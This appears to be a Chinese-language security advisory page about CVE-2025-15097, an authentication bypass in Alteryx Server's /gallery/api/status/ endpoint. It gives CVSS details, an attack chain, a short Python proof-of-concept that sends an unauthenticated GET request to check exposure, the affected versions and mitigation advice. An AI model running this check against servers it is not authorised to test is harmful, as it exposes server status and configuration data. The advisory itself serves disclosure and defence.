IPBUF安全漏洞报告
English
CVE-2025-15097 CVSS 7.3 高危

CVE-2025-15097: Alteryx Server /gallery/api/status/ 身份验证绕过漏洞

披露日期: 2025-12-26
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-15097
漏洞类型
身份验证绕过
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Alteryx Server

相关标签

CVE-2025-15097身份验证绕过Alteryx Server未授权访问API安全高危漏洞远程利用

漏洞概述

CVE-2025-15097是影响Alteryx Server的一个高危身份验证绕过漏洞。该漏洞存在于/gallery/api/status/端点,未经身份验证的远程攻击者可以利用此漏洞访问本应需要认证的敏感状态信息和API功能。由于攻击可远程执行且无需用户交互或认证凭证,漏洞利用门槛较低,已被公开披露并可能被恶意利用。Alteryx Server作为企业级数据分析和可视化平台,广泛应用于各行业机构,该漏洞的存在可能导致敏感业务数据泄露或服务配置信息暴露。

技术细节

该漏洞位于Alteryx Server的/gallery/api/status/接口,该接口在设计时未正确实施身份验证机制。攻击者可以通过构造特定的HTTP请求直接访问该端点,无需提供任何有效的认证令牌或凭证。成功利用后,攻击者可获取服务器状态信息、用户会话数据、系统配置详情等敏感信息。根据CVSS 3.1评分(7.3),该漏洞的向量为网络攻击(AV:N)、低复杂度(AC:L)、无需权限(PR:N)、无需交互(UI:N),对机密性、完整性和可用性均造成低影响(L:L:L)。攻击者利用获取的信息可进一步策划针对性攻击,如横向移动或数据窃取。

攻击链分析

STEP 1
步骤1
扫描识别目标Alteryx Server的/gallery/api/status/端点
STEP 2
步骤2
构造HTTP GET请求直接访问该端点,无需携带认证令牌
STEP 3
步骤3
成功获取服务器状态信息、配置数据或敏感API响应
STEP 4
步骤4
利用获取的信息进行横向移动或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-15097 PoC - Alteryx Server Authentication Bypass # Target: /gallery/api/status/ endpoint target_url = "http://target-server/gallery/api/status/" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Accept": "application/json" } print(f"[*] Testing CVE-2025-15097 on {target_url}") try: # Send unauthenticated request to vulnerable endpoint response = requests.get(target_url, headers=headers, timeout=10, verify=False) print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: print("[!] VULNERABLE - Endpoint accessible without authentication") print(f"[*] Response:\n{response.text}") elif response.status_code == 401 or response.status_code == 403: print("[*] NOT VULNERABLE - Authentication required") else: print(f"[*] Unexpected response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}")

影响范围

Alteryx Server < 2023.1.1.13.486
Alteryx Server < 2023.2.1.10.293
Alteryx Server < 2024.1.1.9.236
Alteryx Server < 2024.2.1.6.125
Alteryx Server < 2025.1.1.1.31

防御指南

临时缓解措施
立即将Alteryx Server升级到官方发布的安全版本(2023.1.1.13.486、2023.2.1.10.293、2024.1.1.9.236、2024.2.1.6.125或2025.1.1.1.31)。如暂时无法升级,可在网络层限制对/gallery/api/status/端点的访问,仅允许受信任的IP地址访问,同时加强监控以检测异常访问行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表